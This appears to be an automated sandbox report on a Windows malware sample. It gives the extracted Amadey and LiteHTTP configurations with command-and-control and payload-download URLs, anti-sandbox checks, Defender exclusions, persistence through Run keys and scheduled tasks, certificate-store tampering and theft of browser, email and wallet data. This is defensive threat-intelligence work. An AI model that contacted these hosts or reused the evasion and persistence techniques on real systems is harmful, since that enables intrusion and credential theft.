Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05/03/2025, 19:40
Static task
static1
Behavioral task
behavioral1
Sample
44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe
Resource
win10v2004-20250217-en
General
-
Target
44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe
-
Size
938KB
-
MD5
ab988dd02c8cea50ac224daf0e53f3e9
-
SHA1
050ebd6e5d25d9b84b722dcea79b2243890c1652
-
SHA256
44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192
-
SHA512
c8c9044520c124e47ace7b53e1824c70b41792cb7cdde0ab272a936dce82fb567743f1b2a7fa506b6357005974b1f33f8fee3f595b5a366894971de0b6f9f1bd
-
SSDEEP
24576:lqDEvCTbMWu7rQYlBQcBiT6rprG8a0Qu:lTvC/MTQYxsWR7a0Q
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Signatures
-
Amadey family
-
Litehttp family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempB8OJ3BKP8KJDUR4I9TX0OSQAH8NXMFQU.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FvbuInU.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 776 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3452 powershell.exe 4084 powershell.exe 4188 powershell.exe 776 powershell.exe -
Creates new service(s) 2 TTPs
-
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 4704 bitsadmin.exe -
Downloads MZ/PE file 12 IoCs
flow pid Process 7 2952 rapes.exe 7 2952 rapes.exe 7 2952 rapes.exe 7 2952 rapes.exe 7 2952 rapes.exe 7 2952 rapes.exe 7 2952 rapes.exe 7 2952 rapes.exe 7 2952 rapes.exe 7 2952 rapes.exe 7 2952 rapes.exe 4 776 powershell.exe -
Stops running service(s) 4 TTPs
-
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x0005000000019c76-1577.dat net_reactor behavioral1/memory/2968-1585-0x00000000010D0000-0x0000000001130000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempB8OJ3BKP8KJDUR4I9TX0OSQAH8NXMFQU.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempB8OJ3BKP8KJDUR4I9TX0OSQAH8NXMFQU.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FvbuInU.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs AhFKwnS.exe -
Executes dropped EXE 21 IoCs
pid Process 2888 TempB8OJ3BKP8KJDUR4I9TX0OSQAH8NXMFQU.EXE 2952 rapes.exe 1676 AhFKwnS.exe 2068 v6Oqdnc.exe 2008 OEHBOHk.exe 2888 MCxU5Fj.exe 2120 MCxU5Fj.exe 472 Process not Found 4040 ckonftponqgz.exe 4996 Y87Oyyz.exe 1760 Y87Oyyz.exe 1764 SplashWin.exe 2848 SplashWin.exe 1928 ce4pMzk.exe 2968 mAtJWNv.exe 844 mAtJWNv.exe 4356 SvhQA35.exe 4992 chromium.exe 1584 FvbuInU.exe 4104 Ps7WqSx.exe 4432 zY9sqWs.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine TempB8OJ3BKP8KJDUR4I9TX0OSQAH8NXMFQU.EXE Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine v6Oqdnc.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine FvbuInU.exe -
Loads dropped DLL 59 IoCs
pid Process 776 powershell.exe 776 powershell.exe 2888 TempB8OJ3BKP8KJDUR4I9TX0OSQAH8NXMFQU.EXE 2888 TempB8OJ3BKP8KJDUR4I9TX0OSQAH8NXMFQU.EXE 2952 rapes.exe 5072 WerFault.exe 5072 WerFault.exe 5072 WerFault.exe 5072 WerFault.exe 5072 WerFault.exe 2952 rapes.exe 2952 rapes.exe 1044 WerFault.exe 1044 WerFault.exe 1044 WerFault.exe 2952 rapes.exe 2952 rapes.exe 2952 rapes.exe 2888 MCxU5Fj.exe 3144 WerFault.exe 3144 WerFault.exe 3144 WerFault.exe 3144 WerFault.exe 3144 WerFault.exe 3356 WerFault.exe 3356 WerFault.exe 3356 WerFault.exe 3356 WerFault.exe 3356 WerFault.exe 472 Process not Found 2952 rapes.exe 4996 Y87Oyyz.exe 1760 Y87Oyyz.exe 1760 Y87Oyyz.exe 1764 SplashWin.exe 1764 SplashWin.exe 1764 SplashWin.exe 1764 SplashWin.exe 2848 SplashWin.exe 2848 SplashWin.exe 2848 SplashWin.exe 2952 rapes.exe 2952 rapes.exe 2952 rapes.exe 2968 mAtJWNv.exe 3188 WerFault.exe 3188 WerFault.exe 3188 WerFault.exe 2800 cmd.exe 2952 rapes.exe 4036 Syncsign_v1.exe 4356 SvhQA35.exe 4992 chromium.exe 2952 rapes.exe 2952 rapes.exe 2952 rapes.exe 2952 rapes.exe 2952 rapes.exe 2952 rapes.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\vYKTGiNz\\Anubis.exe\"" ce4pMzk.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3612 powercfg.exe 912 powercfg.exe 3632 powercfg.exe 4184 powercfg.exe 936 powercfg.exe 4160 powercfg.exe 4144 powercfg.exe 1748 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe OEHBOHk.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe ckonftponqgz.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 2888 TempB8OJ3BKP8KJDUR4I9TX0OSQAH8NXMFQU.EXE 2952 rapes.exe 2068 v6Oqdnc.exe 1584 FvbuInU.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2888 set thread context of 2120 2888 MCxU5Fj.exe 47 PID 4040 set thread context of 4200 4040 ckonftponqgz.exe 80 PID 4040 set thread context of 4376 4040 ckonftponqgz.exe 85 PID 2848 set thread context of 2800 2848 SplashWin.exe 91 PID 2968 set thread context of 844 2968 mAtJWNv.exe 95 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempB8OJ3BKP8KJDUR4I9TX0OSQAH8NXMFQU.EXE File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3720 sc.exe 3816 sc.exe 3936 sc.exe 3952 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
pid pid_target Process procid_target 5072 1676 WerFault.exe 40 1044 2068 WerFault.exe 42 3144 2888 WerFault.exe 46 3356 2120 WerFault.exe 47 3188 2968 WerFault.exe 94 -
System Location Discovery: System Language Discovery 1 TTPs 24 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v6Oqdnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FvbuInU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ps7WqSx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AhFKwnS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempB8OJ3BKP8KJDUR4I9TX0OSQAH8NXMFQU.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fltMC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90aa67a0068edb01 powershell.exe -
Modifies system certificate store 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 FvbuInU.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a FvbuInU.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a FvbuInU.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 mAtJWNv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a mAtJWNv.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1800 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 776 powershell.exe 776 powershell.exe 776 powershell.exe 2888 TempB8OJ3BKP8KJDUR4I9TX0OSQAH8NXMFQU.EXE 2952 rapes.exe 1676 AhFKwnS.exe 2068 v6Oqdnc.exe 2008 OEHBOHk.exe 3452 powershell.exe 2008 OEHBOHk.exe 2008 OEHBOHk.exe 2008 OEHBOHk.exe 2008 OEHBOHk.exe 2008 OEHBOHk.exe 2008 OEHBOHk.exe 2008 OEHBOHk.exe 2008 OEHBOHk.exe 2008 OEHBOHk.exe 4040 ckonftponqgz.exe 4084 powershell.exe 4040 ckonftponqgz.exe 4040 ckonftponqgz.exe 4040 ckonftponqgz.exe 4040 ckonftponqgz.exe 4040 ckonftponqgz.exe 4040 ckonftponqgz.exe 4040 ckonftponqgz.exe 4376 explorer.exe 4376 explorer.exe 4376 explorer.exe 4376 explorer.exe 4376 explorer.exe 4376 explorer.exe 4376 explorer.exe 4376 explorer.exe 4376 explorer.exe 4376 explorer.exe 4376 explorer.exe 4376 explorer.exe 1764 SplashWin.exe 2848 SplashWin.exe 2848 SplashWin.exe 4376 explorer.exe 4376 explorer.exe 1928 ce4pMzk.exe 1928 ce4pMzk.exe 1928 ce4pMzk.exe 1928 ce4pMzk.exe 4376 explorer.exe 4376 explorer.exe 4376 explorer.exe 4376 explorer.exe 4376 explorer.exe 4376 explorer.exe 4376 explorer.exe 2800 cmd.exe 2800 cmd.exe 4376 explorer.exe 4376 explorer.exe 4376 explorer.exe 4376 explorer.exe 4376 explorer.exe 4376 explorer.exe 4376 explorer.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 2848 SplashWin.exe 2800 cmd.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
description pid Process Token: SeDebugPrivilege 776 powershell.exe Token: SeDebugPrivilege 1676 AhFKwnS.exe Token: SeDebugPrivilege 1676 AhFKwnS.exe Token: SeDebugPrivilege 3452 powershell.exe Token: SeShutdownPrivilege 1748 powercfg.exe Token: SeShutdownPrivilege 912 powercfg.exe Token: SeShutdownPrivilege 3612 powercfg.exe Token: SeShutdownPrivilege 3632 powercfg.exe Token: SeDebugPrivilege 4084 powershell.exe Token: SeShutdownPrivilege 4184 powercfg.exe Token: SeShutdownPrivilege 936 powercfg.exe Token: SeShutdownPrivilege 4144 powercfg.exe Token: SeShutdownPrivilege 4160 powercfg.exe Token: SeLockMemoryPrivilege 4376 explorer.exe Token: SeDebugPrivilege 1928 ce4pMzk.exe Token: SeDebugPrivilege 4188 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2600 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 2600 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 2600 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 2888 TempB8OJ3BKP8KJDUR4I9TX0OSQAH8NXMFQU.EXE -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2600 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 2600 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 2600 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2600 wrote to memory of 2168 2600 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 30 PID 2600 wrote to memory of 2168 2600 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 30 PID 2600 wrote to memory of 2168 2600 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 30 PID 2600 wrote to memory of 2168 2600 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 30 PID 2600 wrote to memory of 3068 2600 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 31 PID 2600 wrote to memory of 3068 2600 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 31 PID 2600 wrote to memory of 3068 2600 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 31 PID 2600 wrote to memory of 3068 2600 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 31 PID 2168 wrote to memory of 1800 2168 cmd.exe 33 PID 2168 wrote to memory of 1800 2168 cmd.exe 33 PID 2168 wrote to memory of 1800 2168 cmd.exe 33 PID 2168 wrote to memory of 1800 2168 cmd.exe 33 PID 3068 wrote to memory of 776 3068 mshta.exe 34 PID 3068 wrote to memory of 776 3068 mshta.exe 34 PID 3068 wrote to memory of 776 3068 mshta.exe 34 PID 3068 wrote to memory of 776 3068 mshta.exe 34 PID 776 wrote to memory of 2888 776 powershell.exe 36 PID 776 wrote to memory of 2888 776 powershell.exe 36 PID 776 wrote to memory of 2888 776 powershell.exe 36 PID 776 wrote to memory of 2888 776 powershell.exe 36 PID 2888 wrote to memory of 2952 2888 TempB8OJ3BKP8KJDUR4I9TX0OSQAH8NXMFQU.EXE 38 PID 2888 wrote to memory of 2952 2888 TempB8OJ3BKP8KJDUR4I9TX0OSQAH8NXMFQU.EXE 38 PID 2888 wrote to memory of 2952 2888 TempB8OJ3BKP8KJDUR4I9TX0OSQAH8NXMFQU.EXE 38 PID 2888 wrote to memory of 2952 2888 TempB8OJ3BKP8KJDUR4I9TX0OSQAH8NXMFQU.EXE 38 PID 2952 wrote to memory of 1676 2952 rapes.exe 40 PID 2952 wrote to memory of 1676 2952 rapes.exe 40 PID 2952 wrote to memory of 1676 2952 rapes.exe 40 PID 2952 wrote to memory of 1676 2952 rapes.exe 40 PID 1676 wrote to memory of 5072 1676 AhFKwnS.exe 41 PID 1676 wrote to memory of 5072 1676 AhFKwnS.exe 41 PID 1676 wrote to memory of 5072 1676 AhFKwnS.exe 41 PID 1676 wrote to memory of 5072 1676 AhFKwnS.exe 41 PID 2952 wrote to memory of 2068 2952 rapes.exe 42 PID 2952 wrote to memory of 2068 2952 rapes.exe 42 PID 2952 wrote to memory of 2068 2952 rapes.exe 42 PID 2952 wrote to memory of 2068 2952 rapes.exe 42 PID 2068 wrote to memory of 1044 2068 v6Oqdnc.exe 44 PID 2068 wrote to memory of 1044 2068 v6Oqdnc.exe 44 PID 2068 wrote to memory of 1044 2068 v6Oqdnc.exe 44 PID 2068 wrote to memory of 1044 2068 v6Oqdnc.exe 44 PID 2952 wrote to memory of 2008 2952 rapes.exe 45 PID 2952 wrote to memory of 2008 2952 rapes.exe 45 PID 2952 wrote to memory of 2008 2952 rapes.exe 45 PID 2952 wrote to memory of 2008 2952 rapes.exe 45 PID 2952 wrote to memory of 2888 2952 rapes.exe 46 PID 2952 wrote to memory of 2888 2952 rapes.exe 46 PID 2952 wrote to memory of 2888 2952 rapes.exe 46 PID 2952 wrote to memory of 2888 2952 rapes.exe 46 PID 2888 wrote to memory of 2120 2888 MCxU5Fj.exe 47 PID 2888 wrote to memory of 2120 2888 MCxU5Fj.exe 47 PID 2888 wrote to memory of 2120 2888 MCxU5Fj.exe 47 PID 2888 wrote to memory of 2120 2888 MCxU5Fj.exe 47 PID 2888 wrote to memory of 2120 2888 